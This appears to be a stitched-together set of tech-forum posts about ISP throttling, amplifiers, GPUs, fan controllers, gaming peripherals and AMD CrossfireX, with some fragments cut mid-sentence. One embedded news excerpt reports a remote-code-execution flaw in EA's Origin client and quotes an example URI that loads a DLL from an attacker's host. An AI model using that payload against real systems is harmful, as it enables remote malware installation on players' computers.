Nice. I have a 4meg uncapped account with MWeb. Decided to update my BF to come and hand out some poonage and download FarCry 3 at the same time. Next thing i know. (on the 5th of the Month) i'm being throttled. So this is how uncapped works with MWeb. It's uncapped only as long as you don't download too much in 5 days.

Also. When i first phoned them they said that it's a telkom line fault and it was not. I found out when the telkom technician was here. So i cannot sit with a slow connection for the rest of the month. I'll have to move. Was looking at the Afrihost offering. Looks good.

Hey all,

My Technics amp has sadly died with a F70 error, so I'm needing to replace it.. Any recommendations for a decent, well priced 5.1 amp, that should cater for as many inputs as possible ?

current inputs are:
- PS3
- DVD
- VCR
- TV

So it should cater for at least 5 RCA inputs, and for at least DD and DTS, and preferably be able to join the wifi network for media streaming..

thnx :D

More than 40 million people could be affected by a vulnerability researchers uncovered in EA's Origin online game platform allowing attackers to remotely execute malicious code on players' computers.

The attack, demonstrated on Friday at the Black Hat security conference in Amsterdam, takes just seconds to execute. In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars. It works by manipulating the uniform resource identifiers EA's site uses to automatically start games on an end user's machine. By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game store into an attack platform that can covertly install malware on customers' computers.

"The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism," ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in a paper accompanying last week's demonstration. "In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim's system, which has Origin installed."

The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.

 geeks.
So, I have a client running a wireless network in their office. There is one desktop pc (to be used as a backup server) , and few laptops.
They want to use the pc as a backup server for all the laptops.

He basically wants the most important files ie documents, backed up to the server whenever they are in the vicinity of the office. We wanted to set up a cloud backup service like spideroak, but they prefer to have all data with them. Due to them going out of the office a lot, they do not have a set time that they are there. So a time scheduled backup wont work.

Anyone know of something that could work in this situation?

If you don't know what tahiti 'LE' is, it's a revised version of the 7870 GPU. It's retailing for around R2500.

Not bad for a card that pushes out the same frames as the more expensive 7950 (R3200) & the Nvidia 660ti (R3000) !

Just by price alone it's the best performance per rand gpu you can buy.

Steamroller cores are due @ the end of this year! In APU's only. Steamroller FX series only due next year (2014)

Steamroller is a shrink to 28nm
Can't wait for the HSA feature this core will bring! http://en.wikipedia.org/wiki/Heterogeneous_computing
I'm running 6970's & windows 8. After installing these drivers I had constant bsod's 0xa0000001 code.
Not even an sfc /scannow would run.
I uninstalled them went back to 12.10 and everything is fine I can even run an sfc /scannow (which came up clean)

Use it ... don't use it.
And here's AMD's Official driver cleanup utility: http://sites.amd.com/us/game/downloa...l-utility.aspx
Crapberry is out. Will not consider them at all. :p

I currently have a rooted Desire HD. Happy to continue with droid, but I'm not stuck on it. I'll even consider a crapple. Samsung?
How are the Win8 phones?

Does such a thing exist?

Im using my ROG onboard fan controller but it's not that great you can't change individual fans. It's awesome no doubt but it doesn't do what I require.
I need to control fans on the radiators. I might as well get an 8 channel to control 8 fans even though I don't have 8 fans in my system. (When I upgrade to the corsair 900d with two 480 rads = 8 fans)

I'm looking for something that will run the fans at say 800rpm on idle @ 24 degrees then ramp up to 75% at 45 degrees. (yes my temps are that low, it's a custom water loop)

Just browsing for now, not 100% committed on buying one.

something like: (this is not here in SA)

MaxZero fan controller enables you to control and adjust the revolutions of the fans in your whole computer system, and precisely measures temperatures at four spots. Connect a maximum of 8 fans, and place the 4 temperature sensors to the spots you want to monitor.

Asus & AMD just couldn't let the GTX 690 have the crown.

Introducing the Asus Ares II - A dual 7970 GPU.

Asus is releasing their new ROG ARES II video card which features two AMD Radeon HD 7970 GHz Edition GPUs. They claim its the fatest graphics card available and it outperforms the GeForce GTX 690 reference card by 13 percent and is 31C cooler. It comes with 6GB of video memory, 1,100MHz boost clock, 1,050 base clock, and 2 x 384-bit memory interface. Also comes with a 20-phase Super Alloy Power VRM with top-grade components, three 8-pin power connectors, and Asus’ excellent GPU Tweak round out the ARES II’s feature set. There are no details on a release date or price for now but it should be a great graphics card for any system regardless.

My question, Is this a bit late? AMD have been teasing us with 8 series tidbits and they are coming this year. There is no doubt this card will have a price premium. Was this created to topple the mighty 690? Knowing the game, Yes, they did it, just to beat the all mighty GTX690. /willywaving

(8 series specs & rumors, lets see how it pans out? http://www.techoftomorrow.com/2012/p...leaked-online/)

I'm looking for recommendations for a new gaming mouse and keyboard.

My...

I'm looking for recommendations for a new gaming mouse and keyboard.

My keyboard is an old Logitech G15 (Blue) keyboard

It still works like a champ, but is very worn, and the "A" key is a bit wonky. It used to give me a few issues with the LCD display, but since I've changed my mobo, it has been fine (Old mobo started having USB issues methinks).

My mouse is a Razer Lachesis, which has been giving me uphill on Win8 (side buttons keep switching functions, mouse disconnects and reconnects). Their site does not indicate any kind of expectation of support for Win8 for this particular device, and I'm not sure if it's just the device giving up the ghost, considering that my logitech keyboard is years older than this thing. I'm not too impressed with Razer right now in terms of longevity of their products, also considering their new "activation" requirement for hardware (drm on hardware anyone?), and (currently optional I believe) cloud-based device profile storage... I am not keen at all on getting Razer devices again.

Keyboard Prefs:

While I've become accustomed to having the LCD display, it is not a deal breaker for me (So far I think only the Logitechs have this feature) - one day when I'm big, I'll get a second screen which should render the keyboard's LCD display moot.

<strike>I'm unsure about a mechanical keyboard. I don't know what these cherry mx switches sound like, but I'm not keen on a keyboard that echoes loud 'clack' sounds around the house. I think my swearing in bf3 and everybody yelling over TS is bad enough, even though the kids and wife have learned to sleep through it. I'm quite willing to get one if it's not going to be too noisy. I have memories of old style white plastic keyboards clacking away in my head. I use my keyboard a lot, so if it's too noisy it will drive me nuts.</strike> Having read up on the Cherry MX switches, this is no longer valid.

I really like a keyboard based volume control and mute function (media keys?) but it's not a deal breaker.

I don't really care if there are extra programmable keys... my current keyboard has them and I can't say I've ever used them - probably why I suck at gaming so badly.

Backlit keys are a plus.

Mouse Prefs:

Decent DPI, preferably adjustable.

Wired

Laser

At least an additional thumb button

Scroll wheel must have distinct feeling when scrolling and not scroll smoothly with no resistance.

Scroll wheel button click should be distinct. My lachesis scroll wheel button has become decidedly mushy. I hate scroll wheel buttons though. :p

So, what recommend ye?

The vengeance obviously have a mic which is kind of a big thing and they have had great reviews, the sennheisers are well sennheisers which means great sound quality!

Yes I want wireless, Im so tired of having to untangle my headphones every time I sit at my desk(I have no idea why they tangle that much!)
I like surround sound, my roccat kave's have done an excellent job at it but the one ear cup is a bit broken and they are on their way out.
What would you recommend?

A quick run down on the differences between the three: (since everyone...

A quick run down on the differences between the three: (since everyone gets confused) Generally the terminology used today is wrong by technical standards but it's widely accepted as the previous generation are no longer seen anywhere.

1. ATI Crossfire: Using two GPU's in the same series, paired together. (Radeon x800s, x850s, x1800s and x1900s) - Used via Y-dongle. 2nd Generation Crossfire was done via software.

2. AMD CrossfireX: 3rd generation Crossfire, allowing 2 or 3 or 4 Gpu's to be paired. (also know as Crossfire since the 1st generation is no longer used)
2a. CrossFireX can be implemented with varying-GPU cards of the same generation/series. I.E 58xx or 59xx and so forth. So it will be possible to pair a 6770 with a 6750.
2b. CrossFireX configurations can run many monitors of varying size and resolution. All monitors connect to the primary card

3. AMD TriFire: Three GPU's in CrossfireX configuration. (Quadfire? yep, you guessed it, four GPUs.)

4. AMD Hybrid CrossfireX: Using the Cpu's GPU (IGP) paired with a discreet GPU (also referred to as Hybrid Crossfire or Dual Graphics - gotta love marketing.)

Hybrid CrossfireX with APU's, below is a picture of the parings.

Cool so now we know what it is, what mainboard do I choose if I want to run CrossfireX or Hybrid CrossfireX?

Hybrid CrossfireX chipsets: 790GX 780G 760G 785G 880G 890GX 980G (note: all chipsets end with 'G' which supports IGP's.)

AMD CrossfireX chipsets :

890GX - two GPU's only at 8x each, disables IGP
890FX - up to four GPU's @ 8x each or two GPU's at 16x
990X - two GPU's at 8x each
990FX - Up to four GPU's at 8x or two GPU's at 16x

Note: Only AMD's FX series processors support two 16x Gpu's. Previous Generation Phenom's supported 8x.
